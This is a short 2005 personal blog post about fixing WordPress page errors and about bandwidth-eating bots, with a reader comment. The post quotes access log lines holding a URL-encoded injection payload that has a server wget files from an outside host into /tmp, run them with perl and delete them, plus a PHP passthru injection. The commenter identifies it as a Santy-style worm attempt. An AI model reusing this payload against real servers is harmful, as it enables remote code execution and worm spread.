Stuff be Fixed

Most of the error have been fixed. They were caused by a slight change to the structure of WP files and how I had used includes to pull the variou page parts around content. So I’ve reverted all the pages back so no includes are used, and most of it should work for now. Tomorrow – maybe – I’ll stare a lot at the backups and the current stuff and see what’s what – and hell I may even post any solutions :p

Checking errors logs – due to the above – and I’m seeing that my site traffic has rocketed. I’m used to about 100meg/day. It’s now 4 full days into the year and it’s running at 175meg/day. That’s a HUGE increase, and it’s not real traffic, it’s bots stealing bandwidth.

Logs show lines like this:
[client 64.191.29.200] client denied by server configuration: /home/--path--/agm/200312.html&rush=echo _START_; cd

.75.177.60 - - [04/Jan/2005:21:32:21 +0000] "GET stats/agm/
200312.html&rush=%65%63%68%6F%20%5F%53%54%41%52
%54%5F%3B%20cd%20/tmp;wget%20%0Aatlasol.com/.zk/sess
_189f0f0889555397a4de5485dd611111;wget%20atlasol.com/.zk
/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_
189f0f0889555397a4de5485dd611112;rm%20sess_189f0f08895
55397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a
4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485
dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&h
ighlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%
54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%
73%68%5D%29.%2527'; HTTP/1.1" 403 - "-" "LWP::Simple/5.800"i-

I do have some bandwidth protection inside WP, but that doesn’t help any static pages I’ve got. And no, I haven’t a clue what that stuff is, means or whatever. I do know I keep backups though . IP banning – I feel the urge…. (And every single night, without fail, at midnight UK time I have around 10 minutes of constant connection errors).

Personal Note: Tomorrow I go purple. Ever so slightly.

5 thoughts on “Stuff be Fixed

  1. That “stuff” is an escape-coded redirect attempt. If you translate all the jibberish to the HTML equivalent, you’ll get a URL to a site to download all sorts of nastiness onto your site server. The bot is attempting to trick your site server into downloading and executing worm files. It’s way early in the morning for me to be sure, but it sure looks like a new-gen Santy to me.

    Block by user-agent, anything starting with “LWP” or “lwp” and that will stop the bandwidth thrashing.

Comments are closed.